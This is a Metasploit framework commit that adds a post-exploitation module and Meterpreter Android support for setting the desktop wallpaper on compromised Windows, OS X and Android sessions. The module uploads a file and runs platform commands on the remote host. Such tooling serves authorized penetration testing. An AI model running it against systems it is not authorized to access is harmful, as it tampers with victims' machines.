Land #6598, add post module for setting wallpaper

lib/rex/post/meterpreter/extensions/android/android.rb

@@ -71,7 +71,7 @@ class Android < Extension
     response = client.send_request(request)
     response.get_tlv(TLV_TYPE_SHUTDOWN_OK).value
   end
-  
+
   def set_audio_mode(n)
     request = Packet.create_request('set_audio_mode')
     request.add_tlv(TLV_TYPE_AUDIO_MODE, n)
@@ -259,6 +259,12 @@ class Android < Extension
     end
   end
 
+  def set_wallpaper(data)
+    request = Packet.create_request('set_wallpaper')
+    request.add_tlv(TLV_TYPE_WALLPAPER_DATA, data)
+    response = client.send_request(request)
+  end
+
   def send_sms(dest, body, dr)
     request = Packet.create_request('send_sms')
     request.add_tlv(TLV_TYPE_SMS_ADDRESS, dest)

lib/rex/post/meterpreter/extensions/android/tlv.rb

@@ -81,6 +81,8 @@ TLV_TYPE_URI_STRING                  = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS
 TLV_TYPE_ACTIVITY_START_RESULT       = TLV_META_TYPE_BOOL      | (TLV_EXTENSIONS + 9102)
 TLV_TYPE_ACTIVITY_START_ERROR        = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9103)
 
+TLV_TYPE_WALLPAPER_DATA              = TLV_META_TYPE_RAW       | (TLV_EXTENSIONS + 9201)
+
 end
 end
 end

modules/post/multi/manage/set_wallpaper.rb

@@ -0,0 +1,95 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Windows::Registry
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Multi Manage Set Wallpaper',
+        'Description'   => %q(
+          This module will set the desktop wallpaper background on the specified session.
+          The method of setting the wallpaper depends on the platform type.
+        ),
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'timwr'],
+        'Platform'      => [ 'win', 'osx', 'linux', 'android' ],
+        'SessionTypes'  => [ 'meterpreter' ]
+      )
+    )
+
+    register_options(
+      [
+        OptPath.new('WALLPAPER_FILE', [true, 'The local wallpaper file to set on the remote session'])
+      ], self.class)
+  end
+
+  def upload_wallpaper(tempdir, file)
+    remote_file = "#{tempdir}#{File.basename(file)}"
+    print_status("#{peer} - Uploading to #{remote_file}")
+
+    write_file(remote_file, File.binread(file))
+    print_status("#{peer} - Uploaded to #{remote_file}")
+    remote_file
+  end
+
+  #
+  # The OS X version uses an AppleScript to do this
+  #
+  def osx_set_wallpaper(file)
+    remote_file = upload_wallpaper("/tmp/", file)
+    script = %(osascript -e 'tell application "Finder" to set desktop picture to POSIX file "#{remote_file}"')
+    begin
+      cmd_exec(script)
+    rescue EOFError
+      return false
+    end
+    true
+  end
+
+  #
+  # The Windows version uses the SystemParametersInfo call
+  #
+  def win_set_wallpaper(file)
+    remote_file = upload_wallpaper("%TEMP%\\", file)
+    client.railgun.user32.SystemParametersInfoA(0x0014, nil, remote_file, 0x2) != 0
+  end
+
+  #
+  # The Android version uses the set_wallpaper command
+  #
+  def android_set_wallpaper(file)
+    client.android.set_wallpaper(File.binread(file))
+    true
+  end
+
+  def os_set_wallpaper(file)
+    if session.type =~ /meterpreter/ && session.sys.config.sysinfo['OS'] =~ /darwin/i
+      platform = 'osx'
+    end
+    case platform
+    when /osx/
+      osx_set_wallpaper(file)
+    when /win/
+      win_set_wallpaper(file)
+    when /android/
+      android_set_wallpaper(file)
+    end
+  end
+
+  def run
+    file = datastore['WALLPAPER_FILE']
+    if os_set_wallpaper(file)
+      print_good("#{peer} - The wallpaper has been set")
+    else
+      print_error("#{peer} - Unable to set the wallpaper")
+    end
+  end
+end